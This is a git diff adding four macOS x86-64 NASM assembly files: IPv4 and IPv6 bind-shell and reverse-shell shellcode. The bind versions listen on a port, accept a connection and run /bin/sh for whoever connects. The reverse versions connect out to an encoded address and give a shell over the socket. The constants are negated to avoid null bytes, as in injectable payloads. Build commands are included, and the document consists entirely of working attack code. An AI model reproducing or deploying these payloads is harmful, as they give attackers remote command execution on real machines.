diff --git a/macosx-ipv4bind.s b/macosx-ipv4bind.s
new file mode 100644
index 0000000..aac2aa5
--- /dev/null
+++ b/macosx-ipv4bind.s
@@ -0,0 +1,79 @@
+;nasm -f macho64 -o ipv4bind.o ipv4bind.s && ld -macosx_version_min 10.7.0 -o ipv4bind ipv4bind.o
+
+BITS 64
+
+section .text
+
+global start
+
+start:
+ ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
+ xor rdi, rdi
+ mul rdi
+ mov dil, 0x2
+ xor rsi, rsi
+ mov sil, 0x1
+ mov al, 0x2
+ ror rax, 0x28
+ mov r8, rax
+ mov al, 0x61
+ syscall
+
+ ; struct sockaddr_in {
+ ; __uint8_t sin_len;
+ ; sa_family_t sin_family;
+ ; in_port_t sin_port;
+ ; struct in_addr sin_addr;
+ ; char sin_zero[8];
+ ; };
+ mov rsi, 0xffffffffa3eefdf0
+ neg rsi
+ push rsi
+ push rsp
+ pop rsi
+
+ ; bind(host_sockid, &sockaddr, 16)
+ mov rdi, rax
+ xor dl, 0x10
+ mov rax, r8
+ mov al, 0x68
+ syscall
+
+ ; listen(host_sockid, 2)
+ xor rsi, rsi
+ mov sil, 0x2
+ mov rax, r8
+ mov al, 0x6a
+ syscall
+
+ ; accept(host_sockid, 0, 0)
+ xor rsi, rsi
+ xor rdx, rdx
+ mov rax, r8
+ mov al, 0x1e
+ syscall
+
+ mov rdi, rax
+ mov sil, 0x3
+
+dup2:
+ ; dup2(client_sockid, 2)
+ ; -> dup2(client_sockid, 1)
+ ; -> dup2(client_sockid, 0)
+ mov rax, r8
+ mov al, 0x5a
+ sub sil, 1
+ syscall
+ test rsi, rsi
+ jne dup2
+
+ ; execve("//bin/sh", 0, 0)
+ push rsi
+ mov rdi, 0x68732f6e69622f2f
+ push rdi
+ push rsp
+ pop rdi
+ mov rax, r8
+ mov al, 0x3b
+ syscall
+ 
\ No newline at end of file
diff --git a/macosx-ipv4rev.s b/macosx-ipv4rev.s
new file mode 100644
index 0000000..835e2f9
--- /dev/null
+++ b/macosx-ipv4rev.s
@@ -0,0 +1,66 @@
+;nasm -f macho64 -o ipv4rev.o ipv4rev.s && ld -macosx_version_min 10.7.0 -o ipv4rev ipv4rev.o
+
+BITS 64
+
+section .text
+
+global start
+
+start:
+ ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
+ xor rdi, rdi
+ mul rdi
+ mov dil, 0x2
+ xor rsi, rsi
+ mov sil, 0x1
+ mov al, 0x2
+ ror rax, 0x28
+ mov r8, rax
+ mov al, 0x61
+ syscall
+
+ ; struct sockaddr_in {
+ ; __uint8_t sin_len;
+ ; sa_family_t sin_family;
+ ; in_port_t sin_port;
+ ; struct in_addr sin_addr;
+ ; char sin_zero[8];
+ ; };
+ mov rsi, 0xfeffff80a3eefdf0
+ neg rsi
+ push rsi
+ push rsp
+ pop rsi
+
+ ; connect(sockid, &sockaddr, 16)
+ mov rdi, rax
+ xor dl, 0x10
+ mov rax, r8
+ mov al, 0x62
+ syscall
+
+ xor rsi, rsi
+ mov sil, 0x3
+
+dup2:
+ ; dup2(sockid, 2)
+ ; -> dup2(sockid, 1)
+ ; -> dup2(sockid, 0)
+ mov rax, r8
+ mov al, 0x5a
+ sub sil, 1
+ syscall
+ test rsi, rsi
+ jne dup2
+
+ ; execve("//bin/sh", 0, 0)
+ push rsi
+ mov rdi, 0x68732f6e69622f2f
+ push rdi
+ push rsp
+ pop rdi
+ xor rdx, rdx
+ mov rax, r8
+ mov al, 0x3b
+ syscall
+ 
\ No newline at end of file
diff --git a/macosx-ipv6bind.s b/macosx-ipv6bind.s
new file mode 100644
index 0000000..54446a2
--- /dev/null
+++ b/macosx-ipv6bind.s
@@ -0,0 +1,83 @@
+;nasm -f macho64 -o ipv6bind.o ipv6bind.s && ld -macosx_version_min 10.7.0 -o ipv6bind ipv6bind.o
+
+BITS 64
+
+section .text
+
+global start
+
+start:
+ ; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
+ xor rdi, rdi
+ mul rdi
+ mov dil, 0x1e
+ xor rsi, rsi
+ mov sil, 0x1
+ mov al, 0x2
+ ror rax, 0x28
+ mov r8, rax
+ mov al, 0x61
+ syscall
+
+ ; struct sockaddr_in6 {
+ ; __uint8_t sin6_len;
+ ; sa_family_t sin6_family;
+ ; in_port_t sin6_port;
+ ; __uint32_t sin6_flowinfo;
+ ; struct in6_addr sin6_addr;
+ ; __uint32_t sin6_scope_id;
+ ; };
+ xor rsi, rsi
+ push rsi
+ push rsi
+ push rsi
+ mov rsi, 0xffffffffa3eee1e4
+ neg rsi
+ push rsi
+ push rsp
+ pop rsi
+
+ ; bind(host_sockid, &sockaddr, 28)
+ mov rdi, rax
+ xor dl, 0x1c
+ mov rax, r8
+ mov al, 0x68
+ syscall
+
+ ; listen(host_sockid, 2)
+ xor rsi, rsi
+ mov sil, 0x2
+ mov rax, r8
+ mov al, 0x6a
+ syscall
+
+ ; accept(host_sockid, 0, 0)
+ xor rsi, rsi
+ xor rdx, rdx
+ mov rax, r8
+ mov al, 0x1e
+ syscall
+
+ mov rdi, rax
+ mov sil, 0x3
+
+ ; dup2(client_sockid, 2)
+ ; -> dup2(client_sockid, 1)
+ ; -> dup2(client_sockid, 0)
+ dup2:
+ mov rax, r8
+ mov al, 0x5a
+ sub sil, 1
+ syscall
+ test rsi, rsi
+ jne dup2
+
+ ; execve("//bin/sh", 0, 0)
+ push rsi
+ mov rdi, 0x68732f6e69622f2f
+ push rdi
+ push rsp
+ pop rdi
+ mov rax, r8
+ mov al, 0x3b
+ syscall
diff --git a/macosx-ipv6rev.s b/macosx-ipv6rev.s
new file mode 100644
index 0000000..24adf4a
--- /dev/null
+++ b/macosx-ipv6rev.s
@@ -0,0 +1,73 @@
+;nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o
+
+BITS 64
+
+section .text
+
+global start
+
+start:
+ ; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
+ xor rdi, rdi
+ mul rdi
+ mov dil, 0x1e
+ xor rsi, rsi
+ mov sil, 0x1
+ mov al, 0x2
+ ror rax, 0x28
+ mov r8, rax
+ mov al, 0x61
+ syscall
+
+ ; struct sockaddr_in6 {
+ ; __uint8_t sin6_len;
+ ; sa_family_t sin6_family;
+ ; in_port_t sin6_port;
+ ; __uint32_t sin6_flowinfo;
+ ; struct in6_addr sin6_addr;
+ ; __uint32_t sin6_scope_id;
+ ; };
+ xor rsi, rsi
+ push rsi
+ mov rbx, 0xfeffffffffffffff
+ not rbx
+ push rbx
+ push rsi
+ mov rsi, 0xffffffffa3eee1e4
+ neg rsi
+ push rsi
+ push rsp
+ pop rsi
+
+ ; connect(sockid, &sockaddr, 28)
+ mov rdi, rax
+ xor dl, 0x1c
+ mov rax, r8
+ mov al, 0x62
+ syscall
+
+ xor rsi, rsi
+ mov sil, 0x3
+
+dup2:
+ ; dup2(sockid, 2)
+ ; -> dup2(sockid, 1)
+ ; -> dup2(sockid, 0)
+ mov rax, r8
+ mov al, 0x5a
+ sub sil, 1
+ syscall
+ test rsi, rsi
+ jne dup2
+
+ ; execve("//bin/sh", 0, 0)
+ push rsi
+ mov rdi, 0x68732f6e69622f2f
+ push rdi
+ push rsp
+ pop rdi
+ xor rdx, rdx
+ mov rax, r8
+ mov al, 0x3b
+ syscall
+ 
\ No newline at end of file